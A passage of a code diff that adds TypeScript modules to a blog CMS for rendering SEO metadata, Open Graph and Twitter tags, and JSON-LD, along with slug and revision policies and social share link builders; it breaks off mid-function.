+   * Issue #649 — an already-built `NewsArticle` JSON-LD object
+   * (`structured-data-rendering.ts`'s `buildNewsArticleJsonLd`). Serialized
+   * via `renderJsonLdScriptTag` (the ONE place that HTML-escapes it) and
+   * injected as a `<script type="application/ld+json">` just before
+   * `</head>`. `null`/omitted renders nothing extra.
+   */
+  structuredDataJsonLd?: Record<string, unknown> | null;
+};
+
+/**
+ * `og:title`/`og:description`/`og:url` + `twitter:title`/`twitter:description`/
+ * `twitter:card` (Issue #642 — "Open Graph/Twitter Card metadata" for public
+ * social share previews). Derived from the SAME `title`/`description`/
+ * `canonicalUrl` this shell already renders as `<title>`/
+ * `<meta name="description">`/`<link rel="canonical">` — one source of
+ * truth per field, never a second copy that could drift. `og:url` is
+ * omitted (like the canonical link) when `canonicalUrl` is `null` (no safe
+ * URL to point crawlers at). `twitter:card` is always emitted — unlike
+ * `og:image`/`twitter:image` (still gated on a verified R2 image existing,
+ * per Issue #636's R2-only policy), a text-only `summary` card is always
+ * safe to advertise; it upgrades to `summary_large_image` once an image is
+ * present.
+ */
+function renderOpenGraphMetaTags(options: PublicPageShellOptions): string {
+  const isArticle = options.ogType === "article";
+
+  const tags = [
+    options.ogType
+      ? `<meta property="og:type" content="${escapeHtml(options.ogType)}" />`
+      : "",
+    `<meta property="og:title" content="${escapeHtml(options.title)}" />`,
+    `<meta property="og:description" content="${escapeHtml(options.description)}" />`,
+    options.canonicalUrl
+      ? `<meta property="og:url" content="${escapeHtml(options.canonicalUrl)}" />`
+      : "",
+    options.siteName
+      ? `<meta property="og:site_name" content="${escapeHtml(options.siteName)}" />`
+      : "",
+    `<meta property="og:locale" content="${escapeHtml(resolveOgLocale(options.locale))}" />`,
+    `<meta name="twitter:card" content="${options.ogImageUrl ? "summary_large_image" : "summary"}" />`,
+    `<meta name="twitter:title" content="${escapeHtml(options.title)}" />`,
+    `<meta name="twitter:description" content="${escapeHtml(options.description)}" />`,
+    options.ogImageUrl
+      ? `<meta property="og:image" content="${escapeHtml(options.ogImageUrl)}" />`
+      : "",
+    // Issue #649 — `og:image:secure_url` is the same verified R2 URL
+    // (already HTTPS-only, `full-online-r2-architecture.md` §11); Open
+    // Graph treats it as a distinct property from `og:image` for clients
+    // that only trust the `secure_url` variant.
+    options.ogImageUrl
+      ? `<meta property="og:image:secure_url" content="${escapeHtml(options.ogImageUrl)}" />`
+      : "",
+    options.ogImageUrl && options.ogImageMimeType
+      ? `<meta property="og:image:type" content="${escapeHtml(options.ogImageMimeType)}" />`
+      : "",
+    options.ogImageUrl && options.ogImageWidth
+      ? `<meta property="og:image:width" content="${options.ogImageWidth}" />`
+      : "",
+    options.ogImageUrl && options.ogImageHeight
+      ? `<meta property="og:image:height" content="${options.ogImageHeight}" />`
+      : "",
+    options.ogImageUrl
+      ? `<meta name="twitter:image" content="${escapeHtml(options.ogImageUrl)}" />`
+      : "",
+    options.ogImageUrl && options.ogImageAlt
+      ? `<meta property="og:image:alt" content="${escapeHtml(options.ogImageAlt)}" />`
+      : "",
+    options.ogImageUrl && options.ogImageAlt
+      ? `<meta name="twitter:image:alt" content="${escapeHtml(options.ogImageAlt)}" />`
+      : "",
+    isArticle && options.articlePublishedTime
+      ? `<meta property="article:published_time" content="${escapeHtml(options.articlePublishedTime)}" />`
+      : "",
+    isArticle && options.articleModifiedTime
+      ? `<meta property="article:modified_time" content="${escapeHtml(options.articleModifiedTime)}" />`
+      : "",
+    isArticle && options.articleSection
+      ? `<meta property="article:section" content="${escapeHtml(options.articleSection)}" />`
+      : "",
+    ...(isArticle && options.articleTags
+      ? options.articleTags.map(
+          (tag) =>
+            `<meta property="article:tag" content="${escapeHtml(tag)}" />`
+        )
+      : [])
+  ];
+
+  return tags.filter((tag) => tag.length > 0).join("\n");
+}
+
+export function renderPublicPageShell(options: PublicPageShellOptions): string {
+  const canonicalTag = options.canonicalUrl
+    ? `<link rel="canonical" href="${escapeHtml(options.canonicalUrl)}" />`
+    : "";
+
+  const robotsTag = options.robotsContent
+    ? `<meta name="robots" content="${escapeHtml(options.robotsContent)}" />`
+    : "";
+
+  const ogTags = renderOpenGraphMetaTags(options);
+
+  const jsonLdTag = options.structuredDataJsonLd
+    ? renderJsonLdScriptTag(options.structuredDataJsonLd)
+    : "";
+
+  return `<!doctype html>
+<html lang="${escapeHtml(options.locale)}">
+<head>
+<meta charset="utf-8" />
+<meta name="viewport" content="width=device-width, initial-scale=1" />
+<title>${escapeHtml(options.title)}</title>
+<meta name="description" content="${escapeHtml(options.description)}" />
+${canonicalTag}
+${robotsTag}
+${ogTags}
+${jsonLdTag}
+</head>
+<body>
+${options.bodyHtml}
+</body>
+</html>`;
+}
+
+/**
+ * A list of post summaries + prev/next pagination links — shared by the
+ * index, category archive, tag archive, and search result pages (Issue
+ * #540, extended to `/news` in Issue #560) so route files don't each
+ * hand-roll the same list markup independently. `basePath` is the public
+ * listing root each post detail link is built under (`/blog/{tenantCode}`
+ * for the legacy per-tenant-code routes, `/news` for Issue #560's routes) —
+ * `renderPostSummaryListHtml` below is the pre-existing `/blog/{tenantCode}`
+ * convenience wrapper, kept byte-for-byte behavior-identical (same
+ * `escapeHtml` semantics apply whether the tenant code is escaped on its
+ * own or as part of the whole base path string) so no existing call site
+ * needed to change.
+ */
+export function renderPostSummaryListHtmlAtBasePath(
+  basePath: string,
+  posts: readonly PublicPostLinkSummary[],
+  emptyMessage: string
+): string {
+  if (posts.length === 0) {
+    return `<p>${escapeHtml(emptyMessage)}</p>`;
+  }
+
+  return posts
+    .map(
+      (post) => `<article>
+  <h2><a href="${escapeHtml(basePath)}/${escapeHtml(post.slug)}">${escapeHtml(post.title)}</a></h2>
+  ${post.excerpt ? `<p>${escapeHtml(post.excerpt)}</p>` : ""}
+</article>`
+    )
+    .join("\n");
+}
+
+/** `/blog/{tenantCode}` convenience wrapper — see `renderPostSummaryListHtmlAtBasePath` above. */
+export function renderPostSummaryListHtml(
+  tenantCode: string,
+  posts: readonly PublicPostLinkSummary[],
+  emptyMessage: string
+): string {
+  return renderPostSummaryListHtmlAtBasePath(
+    `/blog/${tenantCode}`,
+    posts,
+    emptyMessage
+  );
+}
+
+export function renderPaginationNavHtml(
+  currentPage: number,
+  hasNextPage: boolean,
+  basePath: string
+): string {
+  const prevLink =
+    currentPage > 1
+      ? `<a href="${escapeHtml(basePath)}?page=${currentPage - 1}">Previous</a>`
+      : "";
+  const nextLink = hasNextPage
+    ? `<a href="${escapeHtml(basePath)}?page=${currentPage + 1}">Next</a>`
+    : "";
+
+  return `<nav>${prevLink} ${nextLink}</nav>`;
+}

--- a/src/modules/blog-content/domain/revision-policy.ts
+++ b/src/modules/blog-content/domain/revision-policy.ts
@@ -1,0 +1,30 @@
+/**
+ * Revision rules (Issue #541, doc issue #541 §Revision Rules).
+ * `awcms_blog_revisions` (migration 026) is append-only — restoring a
+ * revision means inserting a *new* revision row with the old content and
+ * writing that content back onto the live post, never `UPDATE`/`DELETE`ing
+ * an existing revision row (module README §Skema data, point 5).
+ */
+
+/** The subset of an update input relevant to "was this a significant change". */
+export type ContentChangeInput = {
+  title?: string;
+  contentJson?: Record<string, unknown>;
+  contentText?: string;
+};
+
+/**
+ * A change is significant when it touches the content itself — title,
+ * contentJson, or contentText. Cosmetic-only fields (seoTitle,
+ * canonicalUrl, featuredMediaId, visibility, locale, menuOrder, slug, ...)
+ * do not trigger a new revision; `awcms_blog_revisions` has no `slug`
+ * column (migration 026), so a slug-only change has nothing to snapshot
+ * beyond what the previous revision already recorded.
+ */
+export function isSignificantContentChange(input: ContentChangeInput): boolean {
+  return (
+    input.title !== undefined ||
+    input.contentJson !== undefined ||
+    input.contentText !== undefined
+  );
+}

--- a/src/modules/blog-content/domain/seo-rendering.ts
+++ b/src/modules/blog-content/domain/seo-rendering.ts
@@ -1,0 +1,186 @@
+import { isAbsoluteHttpUrl } from "./seo-validation";
+
+/**
+ * SEO field fallback resolution for public rendering (Issue #540 §SEO
+ * Requirements). All three functions are pure — no I/O, no escaping (the
+ * caller renders the returned string through `escapeHtml` when embedding
+ * it into a `<meta>`/`<title>` tag, same separation of concerns
+ * `content-block-rendering.ts` uses).
+ */
+
+const MAX_GENERATED_SUMMARY_LENGTH = 160;
+
+export function resolveSeoTitle(post: {
+  seoTitle: string | null;
+  title: string;
+}): string {
+  return post.seoTitle && post.seoTitle.trim().length > 0
+    ? post.seoTitle
+    : post.title;
+}
+
+/**
+ * `metaDescription -> excerpt -> generated summary from contentText`
+ * (doc issue #540: "Fall back to excerpt or safe generated summary when
+ * meta_description is empty"). The generated summary truncates at a word
+ * boundary and never mid-entity — safe because it is plain text, not
+ * markup, and still passes through `escapeHtml` at render time like every
+ * other field here.
+ */
+export function resolveMetaDescription(post: {
+  metaDescription: string | null;
+  excerpt: string | null;
+  contentText: string;
+}): string {
+  if (post.metaDescription && post.metaDescription.trim().length > 0) {
+    return post.metaDescription;
+  }
+
+  if (post.excerpt && post.excerpt.trim().length > 0) {
+    return post.excerpt;
+  }
+
+  return generateSummary(post.contentText, MAX_GENERATED_SUMMARY_LENGTH);
+}
+
+function generateSummary(text: string, maxLength: number): string {
+  const normalized = text.trim().replace(/\s+/g, " ");
+
+  if (normalized.length <= maxLength) {
+    return normalized;
+  }
+
+  const truncated = normalized.slice(0, maxLength);
+  const lastSpace = truncated.lastIndexOf(" ");
+  const boundary = lastSpace > 0 ? truncated.slice(0, lastSpace) : truncated;
+
+  return `${boundary}...`;
+}
+
+/**
+ * `canonicalUrl` (author override) if present and still a safe absolute
+ * http(s) URL, otherwise `selfUrl` (the page's own public URL) — every
+ * public page emits *some* canonical, per standard SEO practice. Returns
+ * `null` only if neither is a safe URL (doc issue #540: "Render canonical
+ * URL only when valid and safe... Do not render unsafe URLs" — `null`
+ * means the caller omits the `<link rel="canonical">` tag entirely rather
+ * than emitting an unsafe one).
+ */
+export function resolveCanonicalUrl(
+  post: { canonicalUrl: string | null },
+  selfUrl: string
+): string | null {
+  if (post.canonicalUrl && isAbsoluteHttpUrl(post.canonicalUrl)) {
+    return post.canonicalUrl;
+  }
+
+  return isAbsoluteHttpUrl(selfUrl) ? selfUrl : null;
+}
+
+/**
+ * `og:image`/`twitter:image` source (Issue #636, epic `news_portal`
+ * §"SEO image rendering uses verified R2 media metadata only"). Takes an
+ * ALREADY-resolved public URL — resolution (looking up the post's
+ * `featuredMediaId` in the news media registry, confirming it is
+ * `verified`/`attached` and belongs to this tenant) is the caller's job
+ * (`blog-content/application/news-media-reference-gate.ts`'s
+ * `resolveVerifiedNewsMediaReferences`), never this function's, since a
+ * pure `domain` function cannot perform that database round trip.
+ * `null` in (no featured image, or one that didn't resolve to a safe R2
+ * object — e.g. full-online R2-only mode is not active for this tenant, so
+ * there is no trusted source to render from at all) means `null` out — the
+ * caller omits the `og:image`/`twitter:image` tags entirely rather than
+ * ever guessing at an unvalidated URL. Re-validates `isAbsoluteHttpUrl` as
+ * defense-in-depth (same convention `resolveCanonicalUrl` uses), even
+ * though the registry's `publicUrl` is already trusted-by-construction.
+ */
+export function resolveOgImageUrl(
+  resolvedFeaturedMediaUrl: string | null
+): string | null {
+  return resolvedFeaturedMediaUrl && isAbsoluteHttpUrl(resolvedFeaturedMediaUrl)
+    ? resolvedFeaturedMediaUrl
+    : null;
+}
+
+/**
+ * `<meta name="robots">` content for a public post detail page (Issue #649).
+ * Every post reaching this function already passed `fetchPublicBlogPostBySlug`'s
+ * own predicate (`status = 'published' AND visibility IN ('public',
+ * 'unlisted') AND deleted_at IS NULL AND published_at <= now()`) — draft/
+ * private/review/archived/soft-deleted/scheduled-future content never
+ * resolves to a row at all (404, no metadata rendered whatsoever), so this
+ * function only ever needs to distinguish the two visibilities that DO
+ * render:
+ *
+ * - `"public"` — fully indexable: `index,follow,max-image-preview:large`
+ *   (the issue body's exact required value for published articles).
+ * - `"unlisted"` — reachable by direct link only, deliberately excluded from
+ *   listings/search/feed/sitemap (see `public-blog-directory.ts`'s header
+ *   comment) — `noindex,nofollow`, so a crawler that stumbles onto the URL
+ *   (e.g. an external backlink) does not index it, matching the entire point
+ *   of the "unlisted" tier existing separately from "public".
+ *
+ * No tenant policy override is implemented for this directive in this
+ * issue (the issue body's "unless tenant policy overrides safely" is a
+ * hedge, not a requirement) — every public post gets the same safe,
+ * conservative default.
+ */
+export function resolveRobotsMetaContent(
+  visibility: "public" | "private" | "unlisted"
+): string {
+  return visibility === "public"
+    ? "index,follow,max-image-preview:large"
+    : "noindex,nofollow";
+}
+
+const OG_LOCALE_MAP: Record<string, string> = {
+  id: "id_ID",
+  en: "en_US"
+};
+
+/**
+ * `og:locale` (Issue #649 — listed explicitly in the issue's required
+ * metadata block). Maps this repo's bare language-code `locale` values
+ * (`"id"`, `"en"`, the only two seeded by `doc 04`'s locale convention) to
+ * the underscore `language_TERRITORY` format Open Graph expects. Passes an
+ * already-formatted `xx_XX` value through unchanged (forward-compatible
+ * with a future per-tenant locale that already specifies a territory), and
+ * falls back to the raw locale string for anything else rather than
+ * guessing a territory it cannot know.
+ */
+export function resolveOgLocale(locale: string): string {
+  const normalized = locale.trim();
+
+  if (/^[a-z]{2}_[A-Z]{2}$/.test(normalized)) {
+    return normalized;
+  }
+
+  return OG_LOCALE_MAP[normalized.toLowerCase()] ?? normalized;
+}
+
+export type ArticleTaxonomyTerm = {
+  taxonomyType: string;
+  name: string;
+};
+
+/**
+ * Splits a post's assigned category/tag terms into `article:section`
+ * (first `"category"`-taxonomy term, or `null`) and `article:tag`/JSON-LD
+ * `keywords` (every `"tag"`-taxonomy term name, in the order the caller
+ * provided) — Issue #649's "tags/categories populate article:tag,
+ * article:section" acceptance criterion. Pure — the caller
+ * (`public-blog-directory.ts`'s `fetchPublicPostTaxonomyTerms`) does the
+ * actual database lookup. Ignores any OTHER category terms beyond the
+ * first (Open Graph's `article:section` is a single value, not a list —
+ * unlike `article:tag`, which is deliberately multi-valued).
+ */
+export function deriveArticleSectionAndTags(
+  terms: readonly ArticleTaxonomyTerm[]
+): { section: string | null; tags: string[] } {
+  const categoryTerm = terms.find((term) => term.taxonomyType === "category");
+  const tagNames = terms
+    .filter((term) => term.taxonomyType === "tag")
+    .map((term) => term.name);
+
+  return { section: categoryTerm?.name ?? null, tags: tagNames };
+}

--- a/src/modules/blog-content/domain/seo-validation.ts
+++ b/src/modules/blog-content/domain/seo-validation.ts
@@ -1,0 +1,102 @@
+export type ValidationError = {
+  field: string;
+  message: string;
+};
+
+export type SeoFieldsInput = {
+  seoTitle?: string | null;
+  metaDescription?: string | null;
+  canonicalUrl?: string | null;
+};
+
+export type SeoValidationResult =
+  | { valid: true; value: SeoFieldsInput }
+  | { valid: false; errors: ValidationError[] };
+
+const MAX_SEO_TITLE_LENGTH = 70;
+const MAX_META_DESCRIPTION_LENGTH = 160;
+
+function isNonEmptyString(value: unknown): value is string {
+  return typeof value === "string" && value.trim().length > 0;
+}
+
+/** Exported for render-time re-validation (Issue #540: "Do not render unsafe URLs" — defense in depth on top of the write-time check below). */
+export function isAbsoluteHttpUrl(value: string): boolean {
+  try {
+    const parsed = new URL(value);
+    return parsed.protocol === "http:" || parsed.protocol === "https:";
+  } catch {
+    return false;
+  }
+}
+
+/**
+ * Validates the optional SEO metadata shared by posts and pages
+ * (`seo_title`, `meta_description`, `canonical_url`). All three fields are
+ * optional/nullable — this only rejects a *present* value that violates the
+ * shape/length rule, matching how `blog_content.seo.configure` gates just
+ * these fields independent of the rest of the content payload.
+ */
+export function validateSeoFields(input: unknown): SeoValidationResult {
+  const errors: ValidationError[] = [];
+  const record = (input ?? {}) as Record<string, unknown>;
+  const value: SeoFieldsInput = {};
+
+  if (record.seoTitle !== undefined && record.seoTitle !== null) {
+    if (!isNonEmptyString(record.seoTitle)) {
+      errors.push({
+        field: "seoTitle",
+        message: "seoTitle must be a non-empty string."
+      });
+    } else if (record.seoTitle.length > MAX_SEO_TITLE_LENGTH) {
+      errors.push({
+        field: "seoTitle",
+        message: `seoTitle must be at most ${MAX_SEO_TITLE_LENGTH} characters.`
+      });
+    } else {
+      value.seoTitle = record.seoTitle.trim();
+    }
+  } else if (record.seoTitle === null) {
+    value.seoTitle = null;
+  }
+
+  if (record.metaDescription !== undefined && record.metaDescription !== null) {
+    if (!isNonEmptyString(record.metaDescription)) {
+      errors.push({
+        field: "metaDescription",
+        message: "metaDescription must be a non-empty string."
+      });
+    } else if (record.metaDescription.length > MAX_META_DESCRIPTION_LENGTH) {
+      errors.push({
+        field: "metaDescription",
+        message: `metaDescription must be at most ${MAX_META_DESCRIPTION_LENGTH} characters.`
+      });
+    } else {
+      value.metaDescription = record.metaDescription.trim();
+    }
+  } else if (record.metaDescription === null) {
+    value.metaDescription = null;
+  }
+
+  if (record.canonicalUrl !== undefined && record.canonicalUrl !== null) {
+    if (
+      !isNonEmptyString(record.canonicalUrl) ||
+      !isAbsoluteHttpUrl(record.canonicalUrl)
+    ) {
+      errors.push({
+        field: "canonicalUrl",
+        message: "canonicalUrl must be an absolute http(s) URL."
+      });
+    } else {
+      value.canonicalUrl = record.canonicalUrl.trim();
+    }
+  } else if (record.canonicalUrl === null) {
+    value.canonicalUrl = null;
+  }
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return { valid: true, value };
+}

--- a/src/modules/blog-content/domain/slug-policy.ts
+++ b/src/modules/blog-content/domain/slug-policy.ts
@@ -1,0 +1,35 @@
+/**
+ * Slug format shared by posts, pages, and terms: lowercase ASCII
+ * alphanumerics separated by single hyphens, no leading/trailing/duplicate
+ * hyphens. Uniqueness itself (`tenant_id, locale, slug` for posts/pages;
+ * `tenant_id, taxonomy_type, slug` for terms) is enforced by the migration's
+ * partial unique index — this only validates the string shape.
+ */
+const SLUG_PATTERN = /^[a-z0-9]+(?:-[a-z0-9]+)*$/;
+
+const MAX_SLUG_LENGTH = 200;
+
+// Combining diacritical marks (U+0300-U+036F) left behind by NFKD
+// normalization, e.g. turning "café" into "cafe" before slugifying.
+const COMBINING_DIACRITICS_PATTERN = /[̀-ͯ]/g;
+
+export function isValidSlug(slug: string): boolean {
+  return (
+    slug.length > 0 && slug.length <= MAX_SLUG_LENGTH && SLUG_PATTERN.test(slug)
+  );
+}
+
+/**
+ * Derives a candidate slug from a title. Callers (Issue #538's create
+ * endpoint) still must check `isValidSlug` and dedup against existing rows —
+ * this is a convenience default, not a guarantee of uniqueness or validity
+ * (e.g. a title with no ASCII alphanumerics yields an empty string).
+ */
+export function slugify(title: string): string {
+  return title
+    .normalize("NFKD")
+    .replace(COMBINING_DIACRITICS_PATTERN, "")
+    .toLowerCase()
+    .replace(/[^a-z0-9]+/g, "-")
+    .replace(/^-+|-+$/g, "");
+}

--- a/src/modules/blog-content/domain/social-preview-image-resolution.ts
+++ b/src/modules/blog-content/domain/social-preview-image-resolution.ts
@@ -1,0 +1,61 @@
+/**
+ * Social/SEO preview image source-priority resolution (Issue #649, epic
+ * `news_portal`). Pure function — takes candidate media object ids plus the
+ * SET of ids that already resolved safely (`NewsMediaPort.resolveMediaReferences`'s
+ * result keys: existing, same-tenant, `verified`/`attached` R2 objects only)
+ * and returns the FIRST candidate, in priority order, that is actually safe
+ * to use. Never does its own database round trip or R2 verification — that
+ * stays the caller's job (the render route/checklist gate), reusing the
+ * SAME bulk resolution Issue #636 already established for featured/gallery
+ * images, never re-deriving it here.
+ *
+ * Issue body's "Metadata source priority" (image):
+ *   1. explicit SEO/social preview image media object (`seoImageMediaId`)
+ *   2. featured image media object (`featuredMediaId`)
+ *   3. first verified R2 image in content, if tenant policy allows
+ *      (`contentImageMediaIds`, in document order — the caller passes an
+ *      EMPTY array when the tenant has disabled this fallback, rather than
+ *      this function taking a policy flag itself, so it stays a pure id-only
+ *      priority chain)
+ *   4. tenant-level R2 fallback social image (`tenantFallbackImageMediaId`)
+ *
+ * A candidate that is present but did NOT resolve safely (missing,
+ * cross-tenant, wrong status) is simply skipped — the chain falls through to
+ * the next source, it never throws or stops early. This mirrors every other
+ * "unsafe reference is silently absent from the resolved map, never thrown"
+ * convention this epic already uses (`resolveOgImageUrl`,
+ * `content-quality-checklist-gate.ts`).
+ */
+export type SocialPreviewImageCandidates = {
+  explicitSocialImageMediaId: string | null;
+  featuredMediaId: string | null;
+  /** Ordered by document position. Pass `[]` (not the full list) when the tenant has disabled the content-image fallback — this function has no separate policy parameter by design. */
+  contentImageMediaIds: readonly string[];
+  tenantFallbackImageMediaId: string | null;
+};
+
+/**
+ * Returns the first candidate id, in priority order, present in
+ * `resolvedMediaIds` — or `null` if none of the candidates resolved safely
+ * (the caller then omits `og:image`/`twitter:image`/JSON-LD `image`
+ * entirely, per Issue #636's "no trusted source, no image tag" convention).
+ */
+export function resolveSocialPreviewImageSourceId(
+  candidates: SocialPreviewImageCandidates,
+  resolvedMediaIds: ReadonlySet<string>
+): string | null {
+  const orderedCandidates = [
+    candidates.explicitSocialImageMediaId,
+    candidates.featuredMediaId,
+    ...candidates.contentImageMediaIds,
+    candidates.tenantFallbackImageMediaId
+  ];
+
+  for (const candidateId of orderedCandidates) {
+    if (candidateId && resolvedMediaIds.has(candidateId)) {
+      return candidateId;
+    }
+  }
+
+  return null;
+}

--- a/src/modules/blog-content/domain/social-share-config.ts
+++ b/src/modules/blog-content/domain/social-share-config.ts
@@ -1,0 +1,69 @@
+/**
+ * `BLOG_SHARE_*` configuration gate — public social share buttons for the
+ * `/blog/{tenantCode}/{slug}` article page.
+ *
+ * PORT-TIME RELOCATE (not a straight file copy from awcms-mini): mini's
+ * equivalent (`news-portal/domain/news-share-config.ts`, its
+ * `resolveNewsShareConfig`) lived in `news_portal` purely for
+ * organizational reasons — it is a pure, dependency-free env-flag reader
+ * with NO actual coupling to `news_portal`'s own tables/state, and
+ * `blog-content/domain/social-share-links.ts`'s `renderSocialShareButtonsHtml`
+ * already took its config as a plain, structurally-typed value
+ * (`SocialShareRenderConfig`) rather than importing `NewsShareConfig`
+ * directly — the exact "composition root wires modules together, domain
+ * layers stay decoupled" convention this repo already uses everywhere else.
+ * Since `news_portal` is not ported to this base (and mini's `/news/**`
+ * route family that also used to call this isn't ported either — see
+ * `blog-content/module.ts`'s `description` field), this resolver now lives
+ * directly in `blog_content`, the one module that actually needs it here.
+ * Env var names are renamed `NEWS_SHARE_*` -> `BLOG_SHARE_*` to match
+ * (there is no `news_portal` in this base to share the vocabulary with).
+ *
+ * Every var here is a simple boolean feature flag gating whether a given
+ * share platform's button/link is rendered on the public article page —
+ * there is no per-tenant override table (unlike `blog_content`'s own
+ * module settings). Defaults `true` (deviating from this repo's usual
+ * "opt-in, default off" convention for new feature flags): no data is
+ * collected, no third-party script is loaded, no secret needs provisioning
+ * — every link is a same-origin `<a href>`/`<button>` built entirely from
+ * data the page already renders publicly (title/excerpt/canonical URL).
+ * Operators who need to disable a specific platform still can, per-flag.
+ *
+ * `BLOG_SHARE_INSTAGRAM_NATIVE_ONLY` does not gate a dedicated "Instagram"
+ * button at all (there is no supported Instagram web-share intent URL — see
+ * `social-share-links.ts`'s own architecture note) — it only toggles a
+ * short, non-interactive accessibility note next to the native-share button
+ * clarifying that Instagram sharing goes through the OS share sheet (native
+ * share) or copy-link, never a fake Instagram URL.
+ */
+import type { SocialShareRenderConfig } from "./social-share-links";
+
+function readBooleanFlag(
+  value: string | undefined,
+  defaultValue: boolean
+): boolean {
+  if (value === undefined) {
+    return defaultValue;
+  }
+
+  return value === "true";
+}
+
+export function resolveBlogShareConfig(
+  env: NodeJS.ProcessEnv = process.env
+): SocialShareRenderConfig {
+  return {
+    buttonsEnabled: readBooleanFlag(env.BLOG_SHARE_BUTTONS_ENABLED, true),
+    native: readBooleanFlag(env.BLOG_SHARE_NATIVE_ENABLED, true),
+    whatsapp: readBooleanFlag(env.BLOG_SHARE_WHATSAPP_ENABLED, true),
+    telegram: readBooleanFlag(env.BLOG_SHARE_TELEGRAM_ENABLED, true),
+    facebook: readBooleanFlag(env.BLOG_SHARE_FACEBOOK_ENABLED, true),
+    linkedin: readBooleanFlag(env.BLOG_SHARE_LINKEDIN_ENABLED, true),
+    x: readBooleanFlag(env.BLOG_SHARE_X_ENABLED, true),
+    email: readBooleanFlag(env.BLOG_SHARE_EMAIL_ENABLED, true),
+    instagramNativeOnly: readBooleanFlag(
+      env.BLOG_SHARE_INSTAGRAM_NATIVE_ONLY,
+      true
+    )
+  };
+}

--- a/src/modules/blog-content/domain/social-share-links.ts
+++ b/src/modules/blog-content/domain/social-share-links.ts
@@ -1,0 +1,223 @@
+import { escapeHtml } from "../../../lib/html/escape";
+import { isAbsoluteHttpUrl } from "./seo-validation";
+
+/**
+ * Public social share buttons (Issue #642, epic `news_portal`). Pure — no
+ * I/O, no `process.env` reads (the caller passes in an already-resolved
+ * config, e.g. `news-portal/domain/news-share-config.ts`'s
+ * `resolveNewsShareConfig()`, structurally compatible with
+ * `SocialShareRenderConfig` below by field name — no cross-module import
+ * needed, same "composition root wires modules together, domain layers stay
+ * decoupled" convention Issue #681 established for this epic).
+ *
+ * ## Canonical URL only — never the request's raw querystring
+ *
+ * Every function here takes an already-resolved `canonicalUrl` (the same
+ * value `seo-rendering.ts`'s `resolveCanonicalUrl` produces and
+ * `renderPublicPageShell` already emits as `<link rel="canonical">`), never
+ * `Astro`/`request.url` directly. That value is server-constructed from
+ * `url.origin` + the post's own slug (`/news/[slug].ts`,
+ * `/blog/[tenantCode]/[slug].ts`) — it can never carry a tracking
+ * querystring, an admin preview flag, a session id, or any other private
+ * query parameter a visitor's actual browser URL might contain, satisfying
+ * the issue's "do not leak admin preview URLs, draft URLs, session IDs, or
+ * private query parameters" requirement structurally rather than by
+ * filtering.
+ *
+ * ## Instagram — no fake web-share URL
+ *
+ * There is no supported Instagram "share to feed/story from an arbitrary
+ * external URL" web intent (unlike WhatsApp/Telegram/Facebook/LinkedIn/X,
+ * which all have documented `https://` share-intent endpoints). Instagram
+ * sharing is therefore NEVER a static `<a href>` in `STATIC_SHARE_LINK_BUILDERS`
+ * below — it is reachable only through the native `navigator.share` share
+ * sheet (when the visitor's OS/browser lists Instagram as an installed
+ * share target) or the copy-link fallback, both already rendered for other
+ * reasons. `renderSocialShareButtonsHtml`'s `instagramNativeOnly` flag only
+ * controls a short static text note clarifying this, never a dedicated
+ * button of its own — see that function's doc comment.
+ */
+
+export type SocialShareArticle = {
+  /** Already-resolved, already-validated canonical URL — see module doc comment. */
+  canonicalUrl: string;
+  title: string;
+  /** Falls back to `title` when null/empty for platforms that share a text snippet (WhatsApp/X/email body). */
+  excerpt: string | null;
+};
+
+/** Structurally compatible with `news-portal/domain/news-share-config.ts`'s `NewsShareConfig` — see module doc comment for why this isn't imported from there directly. */
+export type SocialShareRenderConfig = {
+  buttonsEnabled: boolean;
+  native: boolean;
+  whatsapp: boolean;
+  telegram: boolean;
+  facebook: boolean;
+  linkedin: boolean;
+  x: boolean;
+  email: boolean;
+  instagramNativeOnly: boolean;
+};
+
+export type SocialSharePlatform =
+  "whatsapp" | "telegram" | "facebook" | "linkedin" | "x_twitter" | "email";
+
+export type SocialShareLink = {
+  platform: SocialSharePlatform;
+  label: string;
+  href: string;
+};
+
+function shareText(article: SocialShareArticle): string {
+  return article.excerpt && article.excerpt.trim().length > 0
+    ? article.excerpt
+    : article.title;
+}
+
+/**
+ * Every entry's `buildHref` receives the already-validated `canonicalUrl` +
+ * article fields and returns a fully `encodeURIComponent`-escaped share
+ * intent URL. This array IS the platform allowlist (issue: "keep all share
+ * URLs encoded and allowlisted by platform") — no caller can request a
+ * platform outside this fixed set, and no raw/unencoded value is ever
+ * concatenated into a URL.
+ */
+const STATIC_SHARE_LINK_BUILDERS: ReadonlyArray<{
+  platform: SocialSharePlatform;
+  label: string;
+  isEnabled: (config: SocialShareRenderConfig) => boolean;
+  buildHref: (article: SocialShareArticle) => string;
+}> = [
+  {
+    platform: "whatsapp",
+    label: "WhatsApp",
+    isEnabled: (config) => config.whatsapp,
+    buildHref: (article) =>
+      `https://wa.me/?text=${encodeURIComponent(`${article.title} ${article.canonicalUrl}`)}`
+  },
+  {
+    platform: "telegram",
+    label: "Telegram",
+    isEnabled: (config) => config.telegram,
+    buildHref: (article) =>
+      `https://t.me/share/url?url=${encodeURIComponent(article.canonicalUrl)}&text=${encodeURIComponent(article.title)}`
+  },
+  {
+    platform: "facebook",
+    label: "Facebook",
+    isEnabled: (config) => config.facebook,
+    buildHref: (article) =>
+      `https://www.facebook.com/sharer/sharer.php?u=${encodeURIComponent(article.canonicalUrl)}`
+  },
+  {
+    platform: "linkedin",
+    label: "LinkedIn",
+    isEnabled: (config) => config.linkedin,
+    buildHref: (article) =>
+      `https://www.linkedin.com/sharing/share-offsite/?url=${encodeURIComponent(article.canonicalUrl)}`
+  },
+  {
+    platform: "x_twitter",
+    label: "X",
+    isEnabled: (config) => config.x,
+    buildHref: (article) =>
+      `https://twitter.com/intent/tweet?url=${encodeURIComponent(article.canonicalUrl)}&text=${encodeURIComponent(article.title)}`
+  },
+  {
+    platform: "email",
+    label: "Email",
+    isEnabled: (config) => config.email,
+    buildHref: (article) =>
+      `mailto:?subject=${encodeURIComponent(article.title)}&body=${encodeURIComponent(`${shareText(article)}\n\n${article.canonicalUrl}`)}`
+  }
+];
+
+/**
+ * Builds the enabled static-link platforms only (native share + copy link
+ * are not part of this list — they need client-side JS, rendered separately
+ * by `renderSocialShareButtonsHtml`). Returns `[]` when the canonical URL
+ * isn't a safe absolute http(s) URL — same "degrade, don't render an unsafe
+ * link" convention `resolveOgImageUrl`/`resolveCanonicalUrl` use.
+ */
+export function buildSocialShareLinks(
+  article: SocialShareArticle,
+  config: SocialShareRenderConfig
+): SocialShareLink[] {
+  if (!isAbsoluteHttpUrl(article.canonicalUrl)) {
